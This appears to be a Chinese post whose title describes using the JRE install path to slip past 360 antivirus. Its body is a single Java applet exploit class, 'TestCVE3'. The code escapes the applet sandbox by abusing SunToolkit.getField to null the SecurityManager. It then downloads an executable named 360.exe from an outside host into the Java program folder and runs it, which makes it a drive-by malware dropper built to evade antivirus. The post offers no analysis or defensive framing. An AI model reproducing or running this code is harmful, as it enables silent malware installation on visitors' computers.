Java漏洞利用-jre安装路径绕过360拦截

??

?

import java.applet.Applet;import java.beans.Expression;import java.beans.Statement;import java.io.DataInputStream;import java.io.DataOutputStream;import java.io.FileOutputStream;import java.io.IOException;import java.lang.reflect.Field;import java.net.HttpURLConnection;import java.net.URL;import java.security.AccessControlContext;import java.security.AllPermission;import java.security.CodeSource;import java.security.Permissions;import java.security.ProtectionDomain;import java.security.cert.Certificate;public class TestCVE3 extends Applet{  public void disableSecurity()    throws Throwable  {    Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);    Permissions localPermissions = new Permissions();    localPermissions.add(new AllPermission());    ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);    AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] { localProtectionDomain });    SetField(Statement.class, "acc", localStatement, localAccessControlContext);    localStatement.execute();  }  private Class GetClass(String paramString)    throws Throwable  {    Object[] arrayOfObject = new Object[1];    arrayOfObject[0] = paramString;    Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);    localExpression.execute();    return (Class)localExpression.getValue();  }  private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)    throws Throwable  {    Object[] arrayOfObject = new Object[2];    arrayOfObject[0] = paramClass;    arrayOfObject[1] = paramString;    Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);    localExpression.execute();    ((Field)localExpression.getValue()).set(paramObject1, paramObject2);  }  public void init()  {    try    {      disableSecurity();      downLoad("http://shinewooyun.duapp.com/360.exe", "C:/Program Files/Java/360.exe");      runFile("C:/Program Files/Java/360.exe");    }    catch (Exception localException)    {      localException.printStackTrace();    }    catch (Throwable localThrowable)    {      localThrowable.printStackTrace();    }  }  public void downLoad(String paramString1, String paramString2)  {    try    {      URL localURL = new URL(paramString1);      HttpURLConnection localHttpURLConnection = (HttpURLConnection)localURL.openConnection();      DataInputStream localDataInputStream = new DataInputStream(localHttpURLConnection.getInputStream());      DataOutputStream localDataOutputStream = new DataOutputStream(new FileOutputStream(paramString2));      byte[] arrayOfByte = new byte[4096];      int i = 0;      while ((i = localDataInputStream.read(arrayOfByte)) > 0) {        localDataOutputStream.write(arrayOfByte, 0, i);      }      localDataOutputStream.close();      localDataInputStream.close();    }    catch (Exception localException) {      localException.printStackTrace();    }  }  public void runFile(String paramString)  {    try    {      Runtime.getRuntime().exec(paramString);    }    catch (IOException localIOException) {      localIOException.printStackTrace();    }  }}

?

?

?

?

?